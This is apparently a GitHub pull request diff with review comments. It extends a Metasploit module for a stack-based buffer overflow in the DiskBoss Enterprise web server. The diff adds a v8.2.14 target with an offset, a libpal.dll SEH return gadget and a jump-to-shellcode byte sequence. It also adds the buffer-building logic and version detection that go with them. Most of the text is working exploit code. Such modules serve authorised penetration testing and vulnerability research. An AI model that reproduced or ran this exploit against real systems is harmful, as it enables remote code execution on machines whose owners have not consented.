Update DiskBoss Module (EDB 42395) #9268
@@ -14,20 +14,23 @@ def initialize(info = {}) | |
'Name' => 'DiskBoss Enterprise GET Buffer Overflow', | ||
'Description' => %q{ | ||
This module exploits a stack-based buffer overflow vulnerability | ||
in the web interface of DiskBoss Enterprise v7.5.12 and v7.4.28, | ||
in the web interface of DiskBoss Enterprise v7.5.12, v7.4.28, and v8.2.14, | ||
caused by improper bounds checking of the request path in HTTP GET | ||
requests sent to the built-in web server. This module has been | ||
tested successfully on Windows XP SP3 and Windows 7 SP1. | ||
}, | ||
'License' => MSF_LICENSE, | ||
'Author' => | ||
[ | ||
'vportal', # Vulnerability discovery and PoC | ||
'Gabor Seljan' # Metasploit module | ||
'vportal', # Vulnerability discovery and PoC | ||
'Gabor Seljan', # Metasploit module | ||
'Ahmad Mahfouz', # Vulnerability discovery and PoC | ||
'Jacob Robles' # Metasploit module | ||
], | ||
'References' => | ||
[ | ||
['EDB', '40869'] | ||
['EDB', '40869'], | ||
['EDB', '42395'] | ||
], | ||
'DefaultOptions' => | ||
{ | ||
|
@@ -60,6 +63,13 @@ def initialize(info = {}) | |
'Offset' => 2471, | ||
'Ret' => 0x100461da # ADD ESP,0x68 # RETN [libpal.dll] | ||
} | ||
], | ||
[ | ||
'DiskBoss Enterprise v8.2.14', | ||
{ | ||
'Offset' => 2496, | ||
'Ret' => 0x1002A8CA # SEH : # POP EDI # POP ESI # RET 04 [libpal.dll] | ||
} | ||
] | ||
], | ||
'Privileged' => true, | ||
|
@@ -74,7 +84,7 @@ def check | |
) | ||
|
||
if res && res.code == 200 | ||
if res.body =~ /DiskBoss Enterprise v7\.(4\.28|5\.12)/ | ||
if res.body =~ /DiskBoss Enterprise v(7\.4\.28|7\.5\.12|8\.2\.14)/ | ||
return Exploit::CheckCode::Vulnerable | ||
elsif res.body =~ /DiskBoss Enterprise/ | ||
return Exploit::CheckCode::Detected | ||
|
@@ -105,6 +115,8 @@ def exploit | |
mytarget = targets[1] | ||
elsif res.body =~ /DiskBoss Enterprise v7\.5\.12/ | ||
mytarget = targets[2] | ||
elsif res.body =~ /DiskBoss Enterprise v8\.2\.14/ | ||
mytarget = targets[3] | ||
end | ||
end | ||
|
||
|
@@ -115,11 +127,22 @@ def exploit | |
print_status("Selected Target: #{mytarget.name}") | ||
end | ||
|
||
sploit = make_nops(21) | ||
sploit << payload.encoded | ||
sploit << rand_text_alpha(mytarget['Offset'] - payload.encoded.length) | ||
sploit << [mytarget.ret].pack('V') | ||
sploit << rand_text_alpha(2500) | ||
if !(mytarget == targets[3]) | ||
There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. How about rewriting this to use positive logic?
|
||
sploit = make_nops(21) | ||
sploit << payload.encoded | ||
sploit << rand_text_alpha(mytarget['Offset'] - payload.encoded.length) | ||
sploit << [mytarget.ret].pack('V') | ||
sploit << rand_text_alpha(2500) | ||
else | ||
seh = generate_seh_record(mytarget.ret) | ||
sploit = payload.encoded | ||
sploit << rand_text_alpha(mytarget['Offset'] - payload.encoded.length) | ||
sploit[sploit.length, seh.length] = seh | ||
sploit << make_nops(10) | ||
sploit << "\xE9\x25\xBF\xFF\xFF" # JMP to ShellCode | ||
There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. How about There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. I took a note to look this up and add it later, will land for now. Thx! |
||
sploit << rand_text_alpha(5000 - sploit.length) | ||
|
||
There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. Nix this newline when you refactor. |
||
end | ||
|
||
send_request_cgi( | ||
'method' => 'GET', | ||
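Review bot: `sploit[sploit.length, seh.length] = seh` in the v8.2.14 branch is an index assignment at the very end of the string, which is simply an append; every surrounding line builds the buffer with `<<`, so `sploit << seh` reads the same as the rest of the method and is easier to verify at a glance. The new target's `'Ret' => 0x1002A8CA` also uses uppercase hex while the existing entries are lowercase (`0x100461da`); writing `0x1002a8ca` keeps the target table uniform. The Description still states the module has been tested on Windows XP SP3 and Windows 7 SP1, which predates the v8.2.14 target; a short sentence naming the platform the new target was verified on, or noting that it is untested, would keep the module metadata accurate. The exploit method's body begins and ends outside the hunks shown here.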
|
I'd reorder to put your name next to Gabor's.